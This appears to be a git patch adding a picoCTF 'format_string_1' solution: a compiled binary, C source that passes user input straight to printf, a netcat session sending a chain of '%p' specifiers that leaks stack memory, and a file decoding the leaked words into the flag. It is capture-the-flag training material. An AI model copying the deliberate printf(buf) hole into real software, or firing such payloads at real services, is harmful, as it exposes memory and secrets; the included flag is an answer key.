From 9300e7c5f3547fd1dbb2431c37c53713c7dbcd4c Mon Sep 17 00:00:00 2001 From: h7x4 Date: Tue, 3 Sep 2024 20:24:05 +0200 Subject: [PATCH] pwn/format_string_1 --- pwn/format_string_1/flag.txt | 5 +++ pwn/format_string_1/format-string-1 | Bin 0 -> 16256 bytes pwn/format_string_1/format-string-1.c | 44 ++++++++++++++++++++++++++ pwn/format_string_1/output.txt | 4 +++ 4 files changed, 53 insertions(+) create mode 100644 pwn/format_string_1/flag.txt create mode 100755 pwn/format_string_1/format-string-1 create mode 100644 pwn/format_string_1/format-string-1.c create mode 100644 pwn/format_string_1/output.txt diff --git a/pwn/format_string_1/flag.txt b/pwn/format_string_1/flag.txt new file mode 100644 index 0000000..c3023f7 --- /dev/null +++ b/pwn/format_string_1/flag.txt @@ -0,0 +1,5 @@ +# By cutting off a part of the output and giving it to cyberchef (as well as swapping endianness with word length 8), we get: + +0x7b4654436f636970.0x355f31346d316e34.0x3478345f33317937.0x35365f673431665f.0x7d313464303935 + +-> picoCTF{4n1m41_57y13_4x4_f14g_65590d41} diff --git a/pwn/format_string_1/format-string-1 b/pwn/format_string_1/format-string-1 new file mode 100755 index 0000000000000000000000000000000000000000..25e6624576ee746cf85367ecb77de7080d62740c GIT binary patch literal 16256 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 Sh@K0o*cccX + + +int main() { + char buf[1024]; + char secret1[64]; + char flag[64]; + char secret2[64]; + + // Read in first secret menu item + FILE *fd = fopen("secret-menu-item-1.txt", "r"); + if (fd == NULL){ + printf("'secret-menu-item-1.txt' file not found, aborting.\n"); + return 1; + } + fgets(secret1, 64, fd); + // Read in the flag + fd = fopen("flag.txt", "r"); + if (fd == NULL){ + printf("'flag.txt' file not found, aborting.\n"); + return 1; + } + fgets(flag, 64, fd); + // Read in second secret menu item + fd = fopen("secret-menu-item-2.txt", "r"); + if (fd == NULL){ + printf("'secret-menu-item-2.txt' file not found, aborting.\n"); + return 1; + } + fgets(secret2, 64, fd); + + printf("Give me your order and I'll read it back to you:\n"); + fflush(stdout); + scanf("%1024s", buf); + printf("Here's your order: "); + printf(buf); + printf("\n"); + fflush(stdout); + + printf("Bye!\n"); + fflush(stdout); + + return 0; +} diff --git a/pwn/format_string_1/output.txt b/pwn/format_string_1/output.txt new file mode 100644 index 0000000..2041e96 --- /dev/null +++ b/pwn/format_string_1/output.txt @@ -0,0 +1,4 @@ +$ nc mimas.picoctf.net 57678 <<<"%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p" +Give me your order and I'll read it back to you: +Here's your order: 0x402118.(nil).0x7fbbf8d1fa00.(nil).0x89b880.0xa347834.0x7ffd876bd5a0.0x7fbbf8b10e60.0x7fbbf8d354d0.0x1.0x7ffd876bd670.(nil).(nil).0x7b4654436f636970.0x355f31346d316e34.0x3478345f33317937.0x35365f673431665f.0x7d313464303935 +Bye!